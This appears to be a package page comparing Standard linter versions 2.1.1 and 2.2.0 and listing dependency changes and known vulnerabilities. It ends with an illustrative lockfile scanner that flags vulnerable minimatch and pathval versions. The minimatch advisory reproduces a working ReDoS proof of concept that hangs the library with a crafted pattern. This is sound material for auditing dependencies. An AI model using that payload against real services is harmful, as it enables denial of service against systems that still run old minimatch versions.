Standard, the popular JavaScript Standard Style linter, saw a minor version bump from 2.1.1 to 2.2.0, released on January 30, 2015. Both versions keep the core promise of a quick and easy way to enforce a consistent code style across JavaScript projects, and both share the same dependencies: glob, jscs, split, eslint, jshint, find-root and minimatch.
The most notable difference from a developer's perspective is the addition of the minimist dependency in version 2.2.0. This likely introduces improved command-line argument parsing, potentially making the linter more configurable from the terminal; if you use standard as a command-line tool, it may affect the arguments you need to pass. The package run-parallel was also moved from devDependencies to dependencies, indicating that it became a module required to run the tool rather than only to develop it.
Both versions include familiar development dependencies like mkdirp, rimraf, extend.js and run-series, used for tasks like creating directories, removing files, extending objects, and running tasks in series, critical during development and testing.
Developers using Standard can expect the same code style enforcement experience in both releases. Those upgrading to 2.2.0 should, however, be aware of the new minimist dependency's effect on command-line flag handling and of the now-required run-parallel dependency, to ensure a smooth transition. Standard simplifies development by formatting code automatically and reduces style debates within development teams.
All vulnerabilities related to version 2.2.0 of the package
Prototype pollution in pathval
A prototype pollution vulnerability affects all versions of the package pathval below 1.1.1.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
The advisory's proof of concept (straight quotes restored, loop variable declared):
var minimatch = require("minimatch");
// utility function for generating a string of `len` copies of `chr`
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i < len; i++) {
    result = result + chr;
  }
  return result;
};
// an unterminated negated character class followed by a million escaped backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";
// minimatch exploit: the vulnerable regex engine backtracks for a very long time here
console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
Update to version 3.0.2 or later.
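One practical check for a project that depends on standard 2.2.0 is to walk the lockfile and flag the vulnerable ranges named on this page. The script below is an added example, not code from the advisories or from the standard project; the lockfile fragment and the version numbers in it are constructed for illustration, and the only thresholds it knows are the two this page states (minimatch fixed in 3.0.2, pathval fixed in 1.1.1).

```javascript
// Thresholds taken from the advisories on this page; anything below is flagged.
const ADVISORIES = [
  { name: 'minimatch', fixedIn: '3.0.2', title: 'ReDoS in minimatch(path, pattern)' },
  { name: 'pathval', fixedIn: '1.1.1', title: 'Prototype pollution in pathval' },
];

// Compare two "major.minor.patch" strings (prerelease suffix ignored); returns -1, 0 or 1.
function compareVersions(a, b) {
  const pa = a.split('-')[0].split('.').map(Number);
  const pb = b.split('-')[0].split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// Recursively visit nested "dependencies" objects (package-lock v1 layout)
// and collect one {path, name, version} record per installed package.
function collectDeps(tree, path = [], out = []) {
  for (const [name, entry] of Object.entries(tree.dependencies || {})) {
    const here = [...path, name];
    out.push({ path: here.join(' > '), name, version: entry.version });
    collectDeps(entry, here, out); // nested (deduplicated-under-parent) deps
  }
  return out;
}

// Return every installed package whose version is below its advisory's fix.
function findVulnerable(lock) {
  const hits = [];
  for (const dep of collectDeps(lock)) {
    for (const adv of ADVISORIES) {
      if (dep.name === adv.name && compareVersions(dep.version, adv.fixedIn) < 0) {
        hits.push({ ...dep, fixedIn: adv.fixedIn, title: adv.title });
      }
    }
  }
  return hits;
}

// Constructed lockfile fragment (sample versions, not the real dependency tree of
// standard 2.2.0): one old minimatch directly under standard, one fixed copy under glob.
const SAMPLE_LOCK = {
  dependencies: {
    standard: {
      version: '2.2.0',
      dependencies: {
        minimatch: { version: '2.0.10' },
        glob: { version: '4.5.3', dependencies: { minimatch: { version: '3.0.2' } } },
      },
    },
  },
};

for (const h of findVulnerable(SAMPLE_LOCK)) {
  console.log(`${h.path}@${h.version}: ${h.title} (fixed in ${h.fixedIn})`);
}
```

Point `findVulnerable` at `JSON.parse(fs.readFileSync('package-lock.json'))` to run it against a real lockfile; the path shows which parent pulled the old copy in, which is what you need to know to override or upgrade it.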
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when the braceExpand function is called with specific arguments, resulting in a denial of service.